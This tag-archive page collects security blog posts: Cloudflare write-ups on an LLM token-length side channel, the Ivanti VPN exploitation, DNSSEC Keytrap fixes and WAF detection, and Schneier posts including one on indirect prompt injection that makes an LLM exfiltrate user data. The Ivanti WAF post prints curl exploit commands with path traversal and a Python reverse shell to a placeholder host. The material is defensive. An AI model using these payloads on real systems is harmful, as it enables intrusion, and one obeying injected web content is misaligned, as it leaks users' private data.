Tag Archives: vulnerabilities

Mitigating a token-length side-channel attack in our AI products

Post Syndicated from Celso Martinho original https://blog.cloudflare.com/ai-side-channel-attack-mitigated


Since the discovery of CRIME, BREACH, TIME, LUCKY-13, and similar attacks, length-based side-channel attacks have been considered practical. Even though packets were encrypted, attackers were able to infer information about the underlying plaintext by analyzing metadata like packet length or timing information.

Cloudflare was recently contacted by a group of researchers at Ben Gurion University who wrote a paper titled “What Was Your Prompt? A Remote Keylogging Attack on AI Assistants” that describes “a novel side-channel that can be used to read encrypted responses from AI Assistants over the web”.
The Workers AI and AI Gateway team collaborated closely with these security researchers through our Public Bug Bounty program, discovering and fully patching a vulnerability that affects LLM providers. You can read the detailed research paper here.

Since being notified about this vulnerability, we’ve implemented a mitigation to help secure all Workers AI and AI Gateway customers. As far as we could assess, there was no outstanding risk to Workers AI and AI Gateway customers.

How does the side-channel attack work?

In the paper, the authors describe a method in which they intercept the stream of a chat session with an LLM provider, use the network packet headers to infer the length of each token, extract and segment their sequence, and then use their own dedicated LLMs to infer the response.

The two main requirements for a successful attack are an AI chat client running in streaming mode and a malicious actor capable of capturing network traffic between the client and the AI chat service. In streaming mode, the LLM tokens are emitted sequentially, introducing a token-length side-channel. Malicious actors could eavesdrop on packets via public networks or within an ISP.

An example request vulnerable to the side-channel attack looks like this:

curl -X POST \
  https://api.cloudflare.com/client/v4/accounts/<account-id>/ai/run/@cf/meta/llama-2-7b-chat-int8 \
  -H "Authorization: Bearer <Token>" \
  -d '{"stream":true,"prompt":"tell me something about portugal"}'

Let’s use Wireshark to inspect the network packets on the LLM chat session while streaming:

The first packet has a length of 95 and corresponds to the token “Port” which has a length of four. The second packet has a length of 93 and corresponds to the token “ug” which has a length of two, and so on. By removing the likely token envelope from the network packet length, it is easy to infer how many tokens were transmitted and their sequence and individual length just by sniffing encrypted network data.
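As a toy illustration of this step, here is a minimal Python sketch. The fixed 91-byte envelope is a hypothetical constant chosen to match the example above; a real attacker would estimate it from observed traffic:

# Recover per-token lengths from observed packet lengths by
# subtracting a roughly constant per-message envelope.
ENVELOPE = 91  # hypothetical fixed overhead per streamed message
packet_lengths = [95, 93]  # encrypted packet sizes seen on the wire
token_lengths = [p - ENVELOPE for p in packet_lengths]
print(token_lengths)  # [4, 2], consistent with "Port" and "ug"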

Since the attacker needs the sequence of individual token lengths, this vulnerability only affects text generation models using streaming. This means that AI inference providers that use streaming — the most common way of interacting with LLMs — like Workers AI, are potentially vulnerable.

This method requires that the attacker is on the same network or otherwise in a position to observe the communication traffic, and its accuracy depends on knowing the target LLM’s writing style. In ideal conditions, the researchers claim that their system “can reconstruct 29% of an AI assistant’s responses and successfully infer the topic from 55% of them”. It’s also important to note that unlike other side-channel attacks, in this case the attacker has no way of evaluating its prediction against the ground truth. That means that we are as likely to get a sentence with near-perfect accuracy as we are to get one where the only things that match are conjunctions.

Mitigating LLM side-channel attacks

Since this type of attack relies on the length of tokens being inferred from the packet, it can be just as easily mitigated by obscuring token size. The researchers suggested a few strategies to mitigate these side-channel attacks, the simplest of which is padding the token responses with random-length noise to obscure the length of each token, so that responses cannot be inferred from the packets. While we immediately added the mitigation to our own inference product, Workers AI, we also wanted to help customers secure their LLMs regardless of where they are running them by adding it to our AI Gateway.

As of today, all users of Workers AI and AI Gateway are now automatically protected from this side-channel attack.

What we did

Once we got word of this research work and how exploiting the technique could potentially impact our AI products, we did what we always do in situations like this: we assembled a team of systems engineers, security engineers, and product managers and started discussing risk mitigation strategies and next steps. We also had a call with the researchers, who kindly attended, presented their conclusions, and answered questions from our teams.

Unfortunately, at this point, this research does not include actual code that we can use to reproduce the claims or the effectiveness and accuracy of the described side-channel attack. However, we think that the paper has theoretical merit, that it provides enough detail and explanations, and that the risks are not negligible.

We decided to incorporate the first mitigation suggestion in the paper: adding random padding to each message to hide the actual length of tokens in the stream, thereby complicating attempts to infer information based solely on network packet size.

Workers AI, our inference product, is now protected

With our inference-as-a-service product, anyone can use the Workers AI platform and make API calls to our supported AI models. This means that we oversee the inference requests being made to and from the models. As such, we have a responsibility to ensure that the service is secure and protected from potential vulnerabilities. We immediately rolled out a fix once we were notified of the research, and all Workers AI customers are now automatically protected from this side-channel attack. We have not seen any malicious attacks exploiting this vulnerability, other than the ethical testing from the researchers.

Our solution for Workers AI is a variation of the mitigation strategy suggested in the research paper. Since we stream JSON objects rather than raw tokens, instead of padding the tokens with whitespace characters we added a new property, “p” (for padding), that has a string value of variable random length.

Example streaming response using the SSE syntax:

data: {"response":"portugal","p":"abcdefghijklmnopqrstuvwxyz0123456789a"}
data: {"response":" is","p":"abcdefghij"}
data: {"response":" a","p":"abcdefghijklmnopqrstuvwxyz012"}
data: {"response":" southern","p":"ab"}
data: {"response":" European","p":"abcdefgh"}
data: {"response":" country","p":"abcdefghijklmno"}
data: {"response":" located","p":"abcdefghijklmnopqrstuvwxyz012345678"}

This has the advantage that no modifications are required in the SDK or the client code, the changes are invisible to the end-users, and no action is required from our customers. By adding random variable length to the JSON objects, we introduce the same network-level variability, and the attacker essentially loses the required input signal. Customers can continue using Workers AI as usual while benefiting from this protection.
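For illustration, here is a minimal Python sketch of this kind of padding. This is not Cloudflare's actual implementation; the pad_event helper and the MAX_PAD bound are hypothetical:

import json
import secrets
import string

MAX_PAD = 48  # illustrative upper bound on padding length

def pad_event(token: str) -> str:
    # Append a random-length "p" property so that encrypted packet
    # sizes no longer track individual token lengths.
    pad_len = secrets.randbelow(MAX_PAD) + 1  # 1..MAX_PAD characters
    alphabet = string.ascii_lowercase + string.digits
    padding = "".join(secrets.choice(alphabet) for _ in range(pad_len))
    return "data: " + json.dumps({"response": token, "p": padding}) + "\n\n"

for tok in ["portugal", " is", " a", " southern", " European", " country"]:
    print(pad_event(tok), end="")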

One step further: AI Gateway protects users of any inference provider

We added protection to our AI inference product, but we also have a product that proxies requests to any provider — AI Gateway. AI Gateway acts as a proxy between a user and supported inference providers, helping developers gain control, performance, and observability over their AI applications. In line with our mission to help build a better Internet, we wanted to quickly roll out a fix that can help all our customers using text generation AIs, regardless of which provider they use or if they have mitigations to prevent this attack. To do this, we implemented a similar solution that pads all streaming responses proxied through AI Gateway with random noise of variable length.

Our AI Gateway customers are now automatically protected against this side-channel attack, even if the upstream inference providers have not yet mitigated the vulnerability. If you are unsure if your inference provider has patched this vulnerability yet, use AI Gateway to proxy your requests and ensure that you are protected.

Conclusion

At Cloudflare, our mission is to help build a better Internet – that means that we care about all citizens of the Internet, regardless of what their tech stack looks like. We are proud to be able to improve the security of our AI products in a way that is transparent and requires no action from our customers.

We are grateful to the researchers who discovered this vulnerability and have been very collaborative in helping us understand the problem space. If you are a security researcher who is interested in helping us make our products more secure, check out our Bug Bounty program at hackerone.com/cloudflare.

Eliminate VPN vulnerabilities with Cloudflare One

Post Syndicated from Dan Hall original https://blog.cloudflare.com/eliminate-vpn-vulnerabilities-with-cloudflare-one


On January 19, 2024, the Cybersecurity & Infrastructure Security Agency (CISA) issued Emergency Directive 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities. CISA has the authority to issue emergency directives in response to a known or reasonably suspected information security threat, vulnerability, or incident. U.S. Federal agencies are required to comply with these directives.

Federal agencies were directed to apply a mitigation against two recently discovered vulnerabilities; the mitigation was to be applied within three days. Further monitoring by CISA revealed that threat actors were continuing to exploit the vulnerabilities and had developed some workarounds to earlier mitigations and detection methods. On January 31, CISA issued Supplemental Direction V1 to the Emergency Directive instructing agencies to immediately disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure products from agency networks and perform several actions before bringing the products back into service.

This blog post will explore the threat actor’s tactics, discuss the high-value nature of the targeted products, and show how Cloudflare’s Secure Access Service Edge (SASE) platform protects against such threats.

As a side note and showing the value of layered protections, Cloudflare’s WAF had proactively detected the Ivanti zero-day vulnerabilities and deployed emergency rules to protect Cloudflare customers.

Threat Actor Tactics

Forensic investigations (see the Volexity blog for an excellent write-up) indicate that the attacks began as early as December 2023. Piecing together the evidence shows that the threat actors chained two previously unknown vulnerabilities together to gain access to the Connect Secure and Policy Secure appliances and achieve unauthenticated remote code execution (RCE).

CVE-2023-46805 is an authentication bypass vulnerability in the products’ web components that allows a remote attacker to bypass control checks and gain access to restricted resources. CVE-2024-21887 is a command injection vulnerability in the products’ web components that allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. By chaining the two, a remote attacker could bypass authentication, be treated as an “authenticated” administrator, and then take advantage of the ability to execute arbitrary commands on the appliance.

By exploiting these vulnerabilities, the threat actor had near total control of the appliance. Among other things, the attacker was able to:

  • Harvest credentials from users logging into the VPN service
  • Use these credentials to log into protected systems in search of even more credentials
  • Modify files to enable remote code execution
  • Deploy web shells to a number of web servers
  • Reverse tunnel from the appliance back to their command-and-control server (C2)
  • Avoid detection by disabling logging and clearing existing logs

Little Appliance, Big Risk

This is a serious incident that is exposing customers to significant risk. CISA is justified in issuing their directive, and Ivanti is working hard to mitigate the threat and develop patches for the software on their appliances. But it also serves as another indictment of the legacy “castle-and-moat” security paradigm. In that paradigm, remote users were outside the castle while protected applications and resources remained inside. The moat, consisting of a layer of security appliances, separated the two. The moat, in this case the Ivanti appliance, was responsible for authenticating and authorizing users, and then connecting them to protected applications and resources. Attackers and other bad actors were blocked at the moat.

This incident shows us what happens when a bad actor is able to take control of the moat itself, and the challenges customers face to recover control. Two typical characteristics of vendor-supplied appliances and the legacy security strategy highlight the risks:

  • Administrators have access to the internals of the appliance
  • Authenticated users indiscriminately have access to a wide range of applications and resources on the corporate network, increasing the risk of bad actor lateral movement

A better way: Cloudflare’s SASE platform

Cloudflare One is Cloudflare’s SSE and single-vendor SASE platform. While Cloudflare One spans broadly across security and networking services (and you can read about the latest additions here), I want to focus on the two points noted above.

First, Cloudflare One employs the principles of Zero Trust, including the principle of least privilege. As such, users that authenticate successfully only have access to the resources and applications necessary for their role. This principle also helps in the event of a compromised user account as the bad actor does not have indiscriminate network-level access. Rather, least privilege limits the range of lateral movement that a bad actor has, effectively reducing the blast radius.

Second, while customer administrators need to have access to configure their services and policies, Cloudflare One does not provide any external access to the system internals of Cloudflare’s platform. Without that access, a bad actor would not be able to launch the types of attacks executed when they had access to the internals of the Ivanti appliance.  

It’s time to eliminate the legacy VPN

If your organization is impacted by the CISA directive, or you are just ready to modernize and want to augment or replace your current VPN solution, Cloudflare is here to help. Cloudflare’s Zero Trust Network Access (ZTNA) service, part of the Cloudflare One platform, is the fastest and safest way to connect any user to any application.

Contact us to get immediate onboarding help or to schedule an architecture workshop to help you augment or replace your Ivanti (or any) VPN solution.
Not quite ready for a live conversation? Read our learning path article on how to replace your VPN with Cloudflare or our SASE reference architecture for a view of how all of our SASE services and on-ramps work together.

Remediating new DNSSEC resource exhaustion vulnerabilities

Post Syndicated from Vicky Shrestha original https://blog.cloudflare.com/remediating-new-dnssec-resource-exhaustion-vulnerabilities


Cloudflare has been part of a multivendor, industry-wide effort to mitigate two critical DNSSEC vulnerabilities. These vulnerabilities exposed significant risks to critical infrastructures that provide DNS resolution services. Cloudflare provides DNS resolution for anyone to use for free with our public resolver 1.1.1.1 service. Mitigations for the 1.1.1.1 service were applied before these vulnerabilities were disclosed publicly. Internal resolvers using Unbound (open source software) were upgraded promptly after a new software version fixing these vulnerabilities was released.

All Cloudflare DNS infrastructure was protected from both of these vulnerabilities before they were disclosed and is safe today. These vulnerabilities do not affect our Authoritative DNS or DNS firewall products.

All major DNS software vendors have released new versions of their software. All other major DNS resolver providers have also applied appropriate mitigations. Please update your DNS resolver software immediately, if you haven’t done so already.

Background

Domain name system (DNS) security extensions, commonly known as DNSSEC, are extensions to the DNS protocol that add authentication and integrity capabilities. DNSSEC uses cryptographic keys and signatures that allow DNS responses to be validated as authentic. DNSSEC protocol specifications have certain requirements that prioritize availability at the cost of increased complexity and computational cost for the validating DNS resolvers. The mitigations for the vulnerabilities discussed in this blog require local policies to be applied that relax these requirements in order to avoid exhausting the resources of validators.

The design of the DNS and DNSSEC protocols follows the Robustness principle: “be conservative in what you do, be liberal in what you accept from others”. There have been many vulnerabilities in the past that have taken advantage of protocol requirements following this principle. Malicious actors can exploit these vulnerabilities to attack DNS infrastructure, in this case by causing additional work for DNS resolvers by crafting DNSSEC responses with complex configurations. As is often the case, we find ourselves having to create a pragmatic balance between the flexibility that allows a protocol to adapt and evolve and the need to safeguard the stability and security of the services we operate.

Cloudflare’s public resolver 1.1.1.1 is a privacy-centric public resolver service. We have been using stricter validations and limits aimed at protecting our own infrastructure in addition to shielding authoritative DNS servers operated outside our network. As a result, we often receive complaints about resolution failures. Experience shows us that strict validations and limits can impact availability in some edge cases, especially when DNS domains are improperly configured. However, these strict validations and limits are necessary to improve the overall reliability and resilience of the DNS infrastructure.

The vulnerabilities and how we mitigated them are described below.

Keytrap vulnerability (CVE-2023-50387)

Introduction

A DNSSEC signed zone can contain multiple keys (DNSKEY) to sign the contents of a DNS zone and a Resource Record Set (RRSET) in a DNS response can have multiple signatures (RRSIG). Multiple keys and signatures are required to support things like key rollover, algorithm rollover, and multi-signer DNSSEC. DNSSEC protocol specifications require a validating DNS resolver to try every possible combination of keys and signatures when validating a DNS response.

During validation, a resolver looks at the key tag of every signature and tries to find the associated key that was used to sign it. A key tag is an unsigned 16-bit number calculated as a checksum over the key’s resource data (RDATA). Key tags are intended to allow efficient pairing of a signature with the key which has supposedly created it.  However, key tags are not unique, and it is possible that multiple keys can have the same key tag. A malicious actor can easily craft a DNS response with multiple keys having the same key tag together with multiple signatures, none of which might validate. A validating resolver would have to try every combination (number of keys multiplied by number of signatures) when trying to validate this response. This increases the computational cost of the validating resolver many-fold, degrading performance for all its users. This is known as the Keytrap vulnerability.
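For reference, here is a short Python sketch of the key tag computation from RFC 4034, Appendix B. Because the tag is only a 16-bit checksum over the key's RDATA, distinct keys can collide on it:

# Key tag checksum from RFC 4034, Appendix B.
def key_tag(rdata: bytes) -> int:
    acc = 0
    for i, byte in enumerate(rdata):
        acc += (byte << 8) if i % 2 == 0 else byte
    acc += (acc >> 16) & 0xFFFF
    return acc & 0xFFFF

A validator handed K colliding keys and S signatures for a single RRSET may be forced into K × S signature checks, which is the quadratic blow-up Keytrap exploits.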

Variations of this vulnerability include using multiple signatures with one key, using one signature with multiple keys having colliding key tags, and using multiple keys with corresponding hashes added to the parent delegation signer record.

Mitigation

We have limited the maximum number of keys we will accept at a zone cut. A zone cut is where a parent zone delegates to a child zone, e.g. where the .com zone delegates cloudflare.com to Cloudflare nameservers. Even with this limit already in place and various other protections built for our platform, we realized that it would still be computationally costly to process a malicious DNS answer from an authoritative DNS server.

To address and further mitigate this vulnerability, we added a signature validations limit per RRSET and a total signature validations limit per resolution task. One resolution task might include multiple recursive queries to external authoritative DNS servers in order to answer a single DNS question. Client queries exceeding these limits will fail to resolve and will receive a response with Extended DNS Error (EDE) code 0. Furthermore, we added metrics that allow us to detect attacks attempting to exploit this vulnerability.

NSEC3 iteration and closest encloser proof vulnerability (CVE-2023-50868)

Introduction

NSEC3 is an alternative approach for authenticated denial of existence. You can learn more about authenticated denial of existence here. NSEC3 uses a hash derived from DNS names instead of the DNS names directly in an attempt to prevent zone enumeration, and the standard supports multiple iterations for hash calculations. However, because the full DNS name is used as input to the hash calculation, increasing the hashing iterations beyond the initial one doesn't provide any additional value and is not recommended in RFC 9276. This cost is further inflated when finding the closest encloser proof. A malicious DNS response from an authoritative DNS server can set a high NSEC3 iteration count and long DNS names with multiple DNS labels to exhaust the computing resources of a validating resolver by making it do unnecessary hash computations.
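To see where the cost comes from, here is a minimal sketch of NSEC3 name hashing as defined in RFC 5155 (illustrative only):

import hashlib

def nsec3_hash(owner_name_wire: bytes, salt: bytes, iterations: int) -> bytes:
    # H(x) = SHA-1(x || salt), re-applied `iterations` additional times.
    digest = hashlib.sha1(owner_name_wire + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return digest

A closest encloser proof repeats this computation for successive candidate ancestor names, so a long name combined with a high iteration count multiplies the validator's work.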

Mitigation

For this vulnerability, we applied a similar mitigation technique as we did for Keytrap: we added a limit on total hash calculations per resolution task to answer a single DNS question. Similarly, client queries exceeding this limit will fail to resolve and will receive a response with EDE code 27. We also added metrics to track hash calculations, allowing early detection of attacks attempting to exploit this vulnerability.

Timeline (all times UTC)

  • 2023-11-03 16:05: John Todd from Quad9 invites Cloudflare to participate in a joint task force to discuss a new DNS vulnerability.
  • 2023-11-07 14:30: A group of DNS vendors and service providers meets to discuss the vulnerability during IETF 118. Discussion and collaboration continue in a closed chat group hosted at DNS-OARC.
  • 2023-12-08 20:20: Cloudflare public resolver 1.1.1.1 is fully patched to mitigate the Keytrap vulnerability (CVE-2023-50387).
  • 2024-01-17 22:39: Cloudflare public resolver 1.1.1.1 is fully patched to mitigate the NSEC3 iteration count and closest encloser vulnerability (CVE-2023-50868).
  • 2024-02-13 13:04: The patched Unbound package is released.
  • 2024-02-13 23:00: Cloudflare's internal CDN resolver is fully patched to mitigate both CVE-2023-50387 and CVE-2023-50868.

Credits

We would like to thank Elias Heftrig, Haya Schulmann, Niklas Vogel, and Michael Waidner from the German National Research Center for Applied Cybersecurity ATHENE for discovering the Keytrap vulnerability and responsibly disclosing it.

We would like to thank Petr Špaček from Internet Systems Consortium (ISC) for discovering the NSEC3 iteration and closest encloser proof vulnerability and responsibly disclosing it.

We would like to thank John Todd from Quad9 and the DNS Operations Analysis and Research Center (DNS-OARC) for facilitating coordination amongst various stakeholders.

And finally, we would like to thank the DNS-OARC community members, representing various DNS vendors and service providers, who all came together and worked tirelessly to fix these vulnerabilities, working towards the common goal of making the Internet resilient and secure.

On the Insecurity of Software Bloat

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/on-the-insecurity-of-software-bloat.html

Good essay on software bloat and the insecurities it causes.

The world ships too much code, most of it by third parties, sometimes unintended, most of it uninspected. Because of this, there is a huge attack surface full of mediocre code. Efforts are ongoing to improve the quality of code itself, but many exploits are due to logic fails, and less progress has been made scanning for those. Meanwhile, great strides could be made by paring down just how much code we expose to the world. This will increase time to market for products, but legislation is around the corner that should force vendors to take security more seriously.

On Software Liabilities

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/on-software-liabilities.html

Over on Lawfare, Jim Dempsey published a really interesting proposal for software liability: “Standard for Software Liability: Focus on the Product for Liability, Focus on the Process for Safe Harbor.”

Section 1 of this paper sets the stage by briefly describing the problem to be solved. Section 2 canvasses the different fields of law (warranty, negligence, products liability, and certification) that could provide a starting point for what would have to be legislative action establishing a system of software liability. The conclusion is that all of these fields would face the same question: How buggy is too buggy? Section 3 explains why existing software development frameworks do not provide a sufficiently definitive basis for legal liability. They focus on process, while a liability regime should begin with a focus on the product—that is, on outcomes. Expanding on the idea of building codes for building code, Section 4 shows some examples of product-focused standards from other fields. Section 5 notes that already there have been definitive expressions of software defects that can be drawn together to form the minimum legal standard of security. It specifically calls out the list of common software weaknesses tracked by the MITRE Corporation under a government contract. Section 6 considers how to define flaws above the minimum floor and how to limit that liability with a safe harbor.

Full paper here.

Dempsey basically creates three buckets of software vulnerabilities: easy stuff that the vendor should have found and fixed, hard-to-find stuff that the vendor couldn’t be reasonably expected to find, and the stuff in the middle. He draws from other fields—consumer products, building codes, automobile design—to show that courts can deal with the stuff in the middle.

I have long been a fan of software liability as a policy mechanism for improving cybersecurity. And, yes, software is complicated, but we shouldn’t let the perfect be the enemy of the good.

In 2003, I wrote:

Clearly this isn’t all or nothing. There are many parties involved in a typical software attack. There’s the company who sold the software with the vulnerability in the first place. There’s the person who wrote the attack tool. There’s the attacker himself, who used the tool to break into a network. There’s the owner of the network, who was entrusted with defending that network. One hundred percent of the liability shouldn’t fall on the shoulders of the software vendor, just as one hundred percent shouldn’t fall on the attacker or the network owner. But today one hundred percent of the cost falls on the network owner, and that just has to stop.

Courts can adjudicate these complex liability issues, and have figured this thing out in other areas. Automobile accidents involve multiple drivers, multiple cars, road design, weather conditions, and so on. Accidental restaurant poisonings involve suppliers, cooks, refrigeration, sanitary conditions, and so on. We don’t let the fact that no restaurant can possibly fix all of the food-safety vulnerabilities lead us to the conclusion that restaurants shouldn’t be responsible for any food-safety vulnerabilities, yet I hear that line of reasoning regarding software vulnerabilities all of the time.

How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability

Post Syndicated from Himanshu Anand http://blog.cloudflare.com/author/himanshu/ original https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability


Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare’s Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.

The threat: CVE-2023-46805 and CVE-2024-21887

An authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) impacting Ivanti products were recently disclosed and analyzed by AttackerKB. These vulnerabilities pose significant risks that could lead to unauthorized access and control over affected systems. In the following section we discuss how they can be exploited.

Technical analysis

As discussed in AttackerKB, the attacker can send a specially crafted request to the target system using a command like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B

This command targets an endpoint (/license/keys-status/) that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include /api/v1/totp/user-backup-code/../../license/keys-status/. This technique is known as directory traversal.
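You can see the effect of the traversal with a quick Python check (illustrative only):

import posixpath

path = "/api/v1/totp/user-backup-code/../../license/keys-status/"
print(posixpath.normpath(path))  # -> /api/v1/license/keys-status

The request nominally targets the unauthenticated /api/v1/totp/user-backup-code/ path, but the server resolves the dot-dot segments and routes it to the protected endpoint.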

The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:

;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';

The Python reverse shell is a way for the attacker to gain control over the target system.

The vulnerability exists in the way the system processes the node_name parameter. If an attacker can control the value of node_name, they can inject commands into the system.

To elaborate on node_name: it is a component of the endpoint /api/v1/license/keys-status/path:node_name, which is where the issue primarily occurs.

The attacker can send a GET request to the URI path /api/v1/totp/user-backup-code/../../license/keys-status/;CMD; where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.

Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.

The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn’t need to be URL-encoded:

{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}

Although the /api/v1/system/maintenance/archiving/cloud-server-test-connection endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection to reach this endpoint and exploit the vulnerability.

To execute an unauthenticated operating system command, an attacker would use a curl request like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'

Cloudflare’s proactive defense

Cloudflare WAF is supported by an additional AI-powered layer called WAF Attack Score, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate whether the request is malicious, so far focusing on three main categories: XSS, SQLi, and some RCE variations (command injection, Apache Log4j, etc.). The score ranges from 1 to 99, and the lower the score, the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.

Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 in Cloudflare’s dashboard (Security > Events), the Attack Score analysis consists of three individual scores, each labeled to indicate its relevance to a specific attack category. There is also a global score, “WAF Attack Score”, which considers the combined impact of the three. In some cases, the global score is driven by one of the sub-scores when the attack matches a category; here the dominant sub-score is Remote Code Execution, “WAF RCE Attack Score”.

Similarly, for the unauthenticated operating system command request, the AI model returned “WAF Attack Score: 19”, which also falls into the malicious request category. It is worth mentioning that these example scores are not fixed numbers and may vary based on the incoming attack variation.

The great news here is that customers on Enterprise plans with WAF Attack Score enabled and a rule to block low scores (e.g. cf.waf.score le 20), or on Business plans with a rule on the score class (cf.waf.score.class eq "attack"), were already shielded from the exploit attempts tested so far, even before the vulnerability was announced.

Emergency rule deployment

In response to this critical vulnerability, Cloudflare released Emergency Rules on January 17, 2024, within 24 hours of the proof of concept going public. These rules are part of the Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named “Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887”, block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.

Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.

  • New Managed Rule …34ab53c5: Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 (default action: Block)
  • Legacy Managed Rule 100622: Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 (default action: Block)

Implications and best practices

Cloudflare’s response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend that customers deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.

Conclusion

Cloudflare’s proactive approach to cybersecurity, using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how attacks can be identified and stopped even before the underlying vulnerabilities are publicly disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.

Data Exfiltration Using Indirect Prompt Injection

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/data-exfiltration-using-indirect-prompt-injection.html

Interesting attack on a LLM:

In Writer, users can enter a ChatGPT-like session to edit or create their documents. In this chat session, the LLM can retrieve information from sources on the web to assist users in creation of their documents. We show that attackers can prepare websites that, when a user adds them as a source, manipulate the LLM into sending private information to the attacker or perform other malicious activities.

The data theft can include documents the user has uploaded, their chat history or potentially specific private information the chat model can convince the user to divulge at the attacker’s behest.

New Windows/Linux Firmware Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/new-windows-linux-firmware-attack.html

Interesting attack based on malicious pre-OS logo images:

LogoFAIL is a constellation of two dozen newly discovered vulnerabilities that have lurked for years, if not decades, in Unified Extensible Firmware Interfaces responsible for booting modern devices that run Windows or Linux….

The vulnerabilities are the subject of a coordinated mass disclosure released Wednesday. The participating companies comprise nearly the entirety of the x64 and ARM CPU ecosystem, starting with UEFI suppliers AMI, Insyde, and Phoenix (sometimes still called IBVs or independent BIOS vendors); device manufacturers such as Lenovo, Dell, and HP; and the makers of the CPUs that go inside the devices, usually Intel, AMD or designers of ARM CPUs….

As its name suggests, LogoFAIL involves logos, specifically those of the hardware seller that are displayed on the device screen early in the boot process, while the UEFI is still running. Image parsers in UEFIs from all three major IBVs are riddled with roughly a dozen critical vulnerabilities that have gone unnoticed until now. By replacing the legitimate logo images with identical-looking ones that have been specially crafted to exploit these bugs, LogoFAIL makes it possible to execute malicious code at the most sensitive stage of the boot process, which is known as DXE, short for Driver Execution Environment.

“Once arbitrary code execution is achieved during the DXE phase, it’s game over for platform security,” researchers from Binarly, the security firm that discovered the vulnerabilities, wrote in a whitepaper. “From this stage, we have full control over the memory and the disk of the target device, thus including the operating system that will be started.”

From there, LogoFAIL can deliver a second-stage payload that drops an executable onto the hard drive before the main OS has even started.

Details.

It’s an interesting vulnerability. Corporate buyers want the ability to display their own logos, and not the logos of the hardware makers. So the ability has to be in the BIOS, which means that the vulnerabilities aren’t being protected by any of the OS’s defenses. And the BIOS makers probably pulled some random graphics library off the Internet and never gave it a moment’s thought after that.

New Bluetooth Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/12/new-bluetooth-attack.html

New attack breaks forward secrecy in Bluetooth.

Three news articles:

BLUFFS is a series of exploits targeting Bluetooth, aiming to break Bluetooth sessions’ forward and future secrecy, compromising the confidentiality of past and future communications between devices.

